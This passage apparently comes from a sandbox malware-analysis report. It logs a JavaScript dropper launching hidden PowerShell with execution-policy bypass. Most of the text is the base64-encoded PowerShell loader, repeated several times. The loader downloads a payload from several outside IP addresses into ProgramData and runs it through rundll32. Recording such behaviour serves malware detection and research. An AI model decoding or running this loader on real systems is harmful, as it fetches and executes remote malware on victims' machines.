QBBAE0AdwBBADMAQQBBAD0APQAiADsAJABzAGkAdABvAHQAbwB4AGkAcwBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAZQBzAGkAbABpAGMAbwBuAGkAegBlACkAKQA7AHcAZwBlAHQAIAAkAHMAaQB0AG8AdABvAHgAaQBzAG0AIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAGUAbQBpAHMAbwBsAGUAbQBuAG4AZQBzAHMALgBHAHIAZQBmAGYAbwB0AG8AbQBlAEMAYQBuAGEAbgBnAGkAdQBtADsAJABwAGwAYQBuAG8AZwByAGEAcABoAGkAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABBAEEATABnAEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATgBRAEEAMABBAEEAPQA9AGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQASQBBAE0AUQBBAD0AZwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBuAEEARwBVAEEAYgBnAEIAbABBAEgASQBBAFkAUQBCAHMAQQBGAFUAQQBiAGcAQgBqAEEARwA4AEEAYgBnAEIAMgBBAEcAVQBBAGIAZwBCAHAAQQBHAFUAQQBiAGcAQgAwAEEAQwA0AEEAWQB3AEIAaABBAEcAWQBBAFoAUQBBAD0AIgA7ACQAZABhAHkAYgBvAG8AawBJAG4AZgBpAG4AaQB0AGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQgBBAEgAVQBBAGQAQQBCAHYAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAWQBnAEIAdgBBAEcAUQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgBwAEEASABNAEEAWgBRAEIAdQBBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQATQBBAE8AQQBBAD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHkAQQBHAFUAQQBkAEEAQgBsAEEASABNAEEAZABBAEIAcABBAEcAMABBAGIAdwBCAHUAQQBHAGsAQQBaAFEAQgB6AEEARgBNAEEAWQBRAEIAcwBBAEgAQQBBAGEAUQBCAHUAQQBHAGMAQQBiAHcAQgB3AEEARwBFAEEAYgBBAEIAaABBAEgAUQBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAYQB3AEIAcABBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAYQBRAEIAegBBAEcARQBBAFoAQQBCADIAQQBHAFUAQQBjAGcAQgAwAEEARwBVAEEAYgBnAEIAagBBAEcAVQBBAFUAdwBCADAAQQBIAGsAQQBiAEEAQgB2AEEARwA0AEEAZQBRAEIAagBBAEcAZwBBAGEAUQBCAGgAQQBDADQAQQBkAGcAQgBqAEEAQQA9AD0AIgA7ACQAcwBlAG0AaQBuAGkAdQBtAEcAZQBvAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBhAEEAQgBwAEEARwA4AEEAYgBnAEIAcABBAEcANABBAFoAUQBBAHUAQQBHAE0AQQBiAEEAQgBwAEEARwBNAEEAYQB3AEEAPQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdQBBAEQASQBBAE0AZwBBAHgAQQBBAD0APQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMgBBAEMANABBAE0AUQBBADUAQQBEAFkAQQBMAGcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQARQBBAE0AUQBBADMAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAZQBtAGkAcwBvAGwAZQBtAG4AbgBlAHMAcwAuAEcAcgBlAGYAZgBvAHQAbwBtAGUAQwBhAG4AYQBuAGcAaQB1AG0AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADQANwA5ADQANAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAbABBAEcAMABBAGEAUQBCAHoAQQBHADgAQQBiAEEAQgBsAEEARwAwAEEAYgBnAEIAdQBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBSAHcAQgB5AEEARwBVAEEAWgBnAEIAbQBBAEcAOABBAGQAQQBCAHYAQQBHADAAQQBaAFEAQgBEAEEARwBFAEEAYgBnAEIAaABBAEcANABBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQQBzAEEASABBAEEAYwBnAEIAcABBAEcANABBAGQAQQBBADcAQQBBAD0APQAiADsAJABPAHUAdABwAGwAbwBkAGQAZQBkACAAPQAgACIAdgBpAHQAbwBjAGgAZQBtAGkAYwBhAGwAIgA7ACQAZwByAGEAbgBkAGUAdgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAaQBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBhAFEAQgB1AEEARwBjAEEAVABBAEIAbABBAEgAQQBBAGEAUQBCAGsAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAZwBCAHIAQQBBAD0APQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAUQBBAEwAZwBBADEAQQBEAE0AQQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAGwAQQBIAEEAQQBZAFEAQgBzAEEARwBFAEEAWgBRAEIAdgBBAEcAdwBBAGEAUQBCADAAQQBHAGcAQQBhAFEAQgBqAEEAQwA0AEEAYwBBAEIAaABBAEgASQBBAGQAQQBCAHUAQQBHAFUAQQBjAGcAQgB6AEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB1AEEARwBNAEEAWgBRAEIAeQBBAEcANABBAFoAUQBCAGsAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AUgBlAGEAYwB0AEQATwBNADsAfQAgAGMAYQB0AGMAaAAgAHsAJABBAGQAaQBnAGUAaQBUAGgAeQBzAGUAbgAgAD0AIAAiAGEAdgBpAGEAbgBpAHoAZQBkAEIAbABhAHMAdABvAGMAaABlAG0AZQAiADsAJABIAHkAcABlAHIAZABpAHYAaQBzAGkAbwBuACAAPQAgACIAcABhAHIAYQBmAGwAbwBjAGMAdQBsAGEAcgAiADsAJABBAGMAZQB0AHkAbABjAHkAYQBuAGkAZABlAFEAdQBpAGQAZABsAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEASABnAEEAYwBBAEIAcwBBAEcAOABBAGEAUQBCADAAQQBFAE0AQQBiAHcAQgB5AEEASABNAEEAWgBRAEIAcwBBAEcAVQBBAGQAQQBCAGwAQQBHAFEAQQBMAGcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAGIAZwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAWQBRAEIAcwBBAEEAPQA9AHYARgBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAyAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBOAFEAQQA9ACIAOwB9AH0AJAB0AGEAcgBhAHAAbwBuACAAPQAgACIAQQBuAHQAbABlAHIAcwBCAGEAZQBkAGUAawBlAHIAaQBhAG4AIgA7ACQAdABvAGwAegBlAHkAVQBuAHMAdAByAHUAYwB0AHUAcgBhAGwAIAA9ACAANQA2ADIAOwAkAFMAbwBhAHIAaQBuAGcAcwBSAGUAZQBuAHUAbgBjAGkAYQB0AGUAZAAgAD0AIAAiAHYAZQByAHIAdQBjAG8AdQBzACIAOwA="

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW May 12, 2023, 9:27 a.m.	show_type: 0 filepath_r: wscript parameters: "C:\Users\test22\AppData\Local\Temp\Lrvoys.js" somever Unsuperlative filepath: wscript	1	1
CreateProcessInternalW May 12, 2023, 9:27 a.m.	thread_identifier: 2284 thread_handle: 0x000002fc process_identifier: 2280 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAGEAcgBiAGEAcgBpAG8AdQBzAG4AZQBzAHMASABvAHIAbgBwAGkAcABlAHMAIAA9ACAAIgBhAGcAZwByAGEAYwBlAE0AbwBuAGcAaABvAGwAIgA7ACQAQgBhAGcAcgBvAG8AbQBXAGgAaQBtAHMAaQBjACAAPQAgADgAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAUQB1AGkAZABuAHUAbgBjACAAPQAgACIATQBpAGwAbABpAG0AaQBjAHIAbwBuACIAOwAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGsAQQBMAGcAQQB4AEEARABNAEEATgB3AEEAdQBBAEQASQBBAE4AQQBBADQAQQBDADQAQQBNAFEAQQAyAEEARABNAEEATAB3AEIAWQBBAEcANABBAFUAUQBCAGsAQQBEAEkAQQBZAGcAQgBNAEEAQwA4AEEAUgB3AEIAUwBBAEUARQBBAFMAUQBBAHoAQQBIAGMAQQBkAFEAQgByAEEAQQA9AD0AYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBFAGcAQQBNAEEAQgA0AEEARQBZAEEATQBnAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQAawBBAE8AQQBBAHYAQQBFAEUAQQBSAHcAQgAyAEEARgBvAEEAYQBBAEEANABBAEUATQBBAEwAdwBCAHoAQQBEAEkAQQBhAFEAQgBaAEEASABFAEEAVABRAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAFoAQQBCAEoAQQBFAGMAQQBVAHcAQgBGAEEARQBRAEEAYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAEUAQQBNAEEAQQB4AEEAQwA4AEEAYQBBAEEAMwBBAEQARQBBAEwAdwBCAGoAQQBGAFkAQQBNAFEAQgBKAEEARABrAEEAVwBnAEIANgBBAEcAYwBBAGQAUQBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAZABlAHMAaQBsAGkAYwBvAG4AaQB6AGUAIABpAG4AIAAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAAtAHMAcABsAGkAdAAgACIAYwBPAD0ATgAiACkAIAB7ACQAdgBpAHIAZwB1AGwAYQB0AGUAQQBsAGkAYwBhAG4AdAAgAD0AIAAiAHAAbwBrAGUAYgBlAHIAcgBpAGUAcwBIAHkAbgBkAGUAcgAiADsAJABDAHIAYQBuAGUAeQAgAD0AIAAiAHMAZQBtAGkAYwBvAG4AdgBlAHIAZwBlAG4AdABUAGgAaQByAHQAaQBlAHMAIgA7AHQAcgB5ACAAewAkAHUAbgByAGUAYwBrAG8AbgBlAGQATABpAHAAbwBjAGwAYQBzAGkAcwAgAD0AIAAiAFQAbwBsAGwAdABhAGsAZQByACIAOwAkAFIAZQBzAHUAcABpAG4AYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMABBAEMANABBAE0AZwBBAHcAQQBEAFEAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADMAQQBBAD0APQAiADsAJABzAGkAdABvAHQAbwB4AGkAcwBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAZQBzAGkAbABpAGMAbwBuAGkAegBlACkAKQA7AHcAZwBlAHQAIAAkAHMAaQB0AG8AdABvAHgAaQBzAG0AIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAGUAbQBpAHMAbwBsAGUAbQBuAG4AZQBzAHMALgBHAHIAZQBmAGYAbwB0AG8AbQBlAEMAYQBuAGEAbgBnAGkAdQBtADsAJABwAGwAYQBuAG8AZwByAGEAcABoAGkAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABBAEEATABnAEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATgBRAEEAMABBAEEAPQA9AGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQASQBBAE0AUQBBAD0AZwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBuAEEARwBVAEEAYgBnAEIAbABBAEgASQBBAFkAUQBCAHMAQQBGAFUAQQBiAGcAQgBqAEEARwA4AEEAYgBnAEIAMgBBAEcAVQBBAGIAZwBCAHAAQQBHAFUAQQBiAGcAQgAwAEEAQwA0AEEAWQB3AEIAaABBAEcAWQBBAFoAUQBBAD0AIgA7ACQAZABhAHkAYgBvAG8AawBJAG4AZgBpAG4AaQB0AGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQgBBAEgAVQBBAGQAQQBCAHYAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAWQBnAEIAdgBBAEcAUQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgBwAEEASABNAEEAWgBRAEIAdQBBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQATQBBAE8AQQBBAD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHkAQQBHAFUAQQBkAEEAQgBsAEEASABNAEEAZABBAEIAcABBAEcAMABBAGIAdwBCAHUAQQBHAGsAQQBaAFEAQgB6AEEARgBNAEEAWQBRAEIAcwBBAEgAQQBBAGEAUQBCAHUAQQBHAGMAQQBiAHcAQgB3AEEARwBFAEEAYgBBAEIAaABBAEgAUQBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAYQB3AEIAcABBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAYQBRAEIAegBBAEcARQBBAFoAQQBCADIAQQBHAFUAQQBjAGcAQgAwAEEARwBVAEEAYgBnAEIAagBBAEcAVQBBAFUAdwBCADAAQQBIAGsAQQBiAEEAQgB2AEEARwA0AEEAZQBRAEIAagBBAEcAZwBBAGEAUQBCAGgAQQBDADQAQQBkAGcAQgBqAEEAQQA9AD0AIgA7ACQAcwBlAG0AaQBuAGkAdQBtAEcAZQBvAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBhAEEAQgBwAEEARwA4AEEAYgBnAEIAcABBAEcANABBAFoAUQBBAHUAQQBHAE0AQQBiAEEAQgBwAEEARwBNAEEAYQB3AEEAPQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdQBBAEQASQBBAE0AZwBBAHgAQQBBAD0APQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMgBBAEMANABBAE0AUQBBADUAQQBEAFkAQQBMAGcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQARQBBAE0AUQBBADMAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAZQBtAGkAcwBvAGwAZQBtAG4AbgBlAHMAcwAuAEcAcgBlAGYAZgBvAHQAbwBtAGUAQwBhAG4AYQBuAGcAaQB1AG0AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADQANwA5ADQANAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAbABBAEcAMABBAGEAUQBCAHoAQQBHADgAQQBiAEEAQgBsAEEARwAwAEEAYgBnAEIAdQBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBSAHcAQgB5AEEARwBVAEEAWgBnAEIAbQBBAEcAOABBAGQAQQBCAHYAQQBHADAAQQBaAFEAQgBEAEEARwBFAEEAYgBnAEIAaABBAEcANABBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQQBzAEEASABBAEEAYwBnAEIAcABBAEcANABBAGQAQQBBADcAQQBBAD0APQAiADsAJABPAHUAdABwAGwAbwBkAGQAZQBkACAAPQAgACIAdgBpAHQAbwBjAGgAZQBtAGkAYwBhAGwAIgA7ACQAZwByAGEAbgBkAGUAdgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAaQBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBhAFEAQgB1AEEARwBjAEEAVABBAEIAbABBAEgAQQBBAGEAUQBCAGsAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAZwBCAHIAQQBBAD0APQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAUQBBAEwAZwBBADEAQQBEAE0AQQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAGwAQQBIAEEAQQBZAFEAQgBzAEEARwBFAEEAWgBRAEIAdgBBAEcAdwBBAGEAUQBCADAAQQBHAGcAQQBhAFEAQgBqAEEAQwA0AEEAYwBBAEIAaABBAEgASQBBAGQAQQBCAHUAQQBHAFUAQQBjAGcAQgB6AEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB1AEEARwBNAEEAWgBRAEIAeQBBAEcANABBAFoAUQBCAGsAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AUgBlAGEAYwB0AEQATwBNADsAfQAgAGMAYQB0AGMAaAAgAHsAJABBAGQAaQBnAGUAaQBUAGgAeQBzAGUAbgAgAD0AIAAiAGEAdgBpAGEAbgBpAHoAZQBkAEIAbABhAHMAdABvAGMAaABlAG0AZQAiADsAJABIAHkAcABlAHIAZABpAHYAaQBzAGkAbwBuACAAPQAgACIAcABhAHIAYQBmAGwAbwBjAGMAdQBsAGEAcgAiADsAJABBAGMAZQB0AHkAbABjAHkAYQBuAGkAZABlAFEAdQBpAGQAZABsAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEASABnAEEAYwBBAEIAcwBBAEcAOABBAGEAUQBCADAAQQBFAE0AQQBiAHcAQgB5AEEASABNAEEAWgBRAEIAcwBBAEcAVQBBAGQAQQBCAGwAQQBHAFEAQQBMAGcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAGIAZwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAWQBRAEIAcwBBAEEAPQA9AHYARgBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAyAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBOAFEAQQA9ACIAOwB9AH0AJAB0AGEAcgBhAHAAbwBuACAAPQAgACIAQQBuAHQAbABlAHIAcwBCAGEAZQBkAGUAawBlAHIAaQBhAG4AIgA7ACQAdABvAGwAegBlAHkAVQBuAHMAdAByAHUAYwB0AHUAcgBhAGwAIAA9ACAANQA2ADIAOwAkAFMAbwBhAHIAaQBuAGcAcwBSAGUAZQBuAHUAbgBjAGkAYQB0AGUAZAAgAD0AIAAiAHYAZQByAHIAdQBjAG8AdQBzACIAOwA=" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000304	1	1
ShellExecuteExW May 12, 2023, 9:27 a.m.	show_type: 0 filepath_r: powershell parameters: -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAGEAcgBiAGEAcgBpAG8AdQBzAG4AZQBzAHMASABvAHIAbgBwAGkAcABlAHMAIAA9ACAAIgBhAGcAZwByAGEAYwBlAE0AbwBuAGcAaABvAGwAIgA7ACQAQgBhAGcAcgBvAG8AbQBXAGgAaQBtAHMAaQBjACAAPQAgADgAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAUQB1AGkAZABuAHUAbgBjACAAPQAgACIATQBpAGwAbABpAG0AaQBjAHIAbwBuACIAOwAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGsAQQBMAGcAQQB4AEEARABNAEEATgB3AEEAdQBBAEQASQBBAE4AQQBBADQAQQBDADQAQQBNAFEAQQAyAEEARABNAEEATAB3AEIAWQBBAEcANABBAFUAUQBCAGsAQQBEAEkAQQBZAGcAQgBNAEEAQwA4AEEAUgB3AEIAUwBBAEUARQBBAFMAUQBBAHoAQQBIAGMAQQBkAFEAQgByAEEAQQA9AD0AYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBFAGcAQQBNAEEAQgA0AEEARQBZAEEATQBnAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQAawBBAE8AQQBBAHYAQQBFAEUAQQBSAHcAQgAyAEEARgBvAEEAYQBBAEEANABBAEUATQBBAEwAdwBCAHoAQQBEAEkAQQBhAFEAQgBaAEEASABFAEEAVABRAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAFoAQQBCAEoAQQBFAGMAQQBVAHcAQgBGAEEARQBRAEEAYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAEUAQQBNAEEAQQB4AEEAQwA4AEEAYQBBAEEAMwBBAEQARQBBAEwAdwBCAGoAQQBGAFkAQQBNAFEAQgBKAEEARABrAEEAVwBnAEIANgBBAEcAYwBBAGQAUQBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAZABlAHMAaQBsAGkAYwBvAG4AaQB6AGUAIABpAG4AIAAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAAtAHMAcABsAGkAdAAgACIAYwBPAD0ATgAiACkAIAB7ACQAdgBpAHIAZwB1AGwAYQB0AGUAQQBsAGkAYwBhAG4AdAAgAD0AIAAiAHAAbwBrAGUAYgBlAHIAcgBpAGUAcwBIAHkAbgBkAGUAcgAiADsAJABDAHIAYQBuAGUAeQAgAD0AIAAiAHMAZQBtAGkAYwBvAG4AdgBlAHIAZwBlA